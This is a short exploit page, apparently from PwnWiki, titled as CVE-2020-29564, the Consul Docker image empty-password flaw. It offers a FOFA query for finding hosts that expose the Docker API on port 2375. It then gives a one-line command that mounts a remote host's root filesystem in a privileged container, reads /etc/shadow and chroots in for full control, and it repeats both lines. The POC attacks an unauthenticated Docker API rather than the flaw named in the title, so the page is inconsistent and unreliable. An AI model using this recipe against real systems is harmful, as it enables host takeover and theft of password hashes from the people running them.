CVE-2020-29564 Consul Docker images 空密碼登錄漏洞
From PwnWiki
FOFA
port="2375" && protocol=="docker"
POC
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine File Access: cat /mnt/etc/shadow RCE: chroot /mnt
port="2375" && protocol=="docker"
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine File Access: cat /mnt/etc/shadow RCE: chroot /mnt